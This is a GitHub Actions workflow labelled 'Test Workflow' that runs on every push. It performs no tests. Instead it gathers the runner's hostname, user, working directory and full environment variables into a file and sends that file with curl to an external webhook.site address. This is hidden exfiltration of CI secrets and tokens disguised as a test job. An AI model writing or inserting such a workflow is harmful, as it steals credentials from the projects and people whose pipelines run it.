name: Test Workflow
on: push
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Collect info
        run: |
          echo "Hostname: $(hostname)" > output.txt
          echo "User: $(whoami)" >> output.txt
          echo "PWD: $(pwd)" >> output.txt
          echo "Env:" >> output.txt
          env >> output.txt
      - name: Send to webhook
        run: |
          curl -X POST -H Content-Type: text/plain --data-binary @output.txt https://webhook.site/d83baa6d-8ba7-42bd-80ad-0a5cecf9aea5
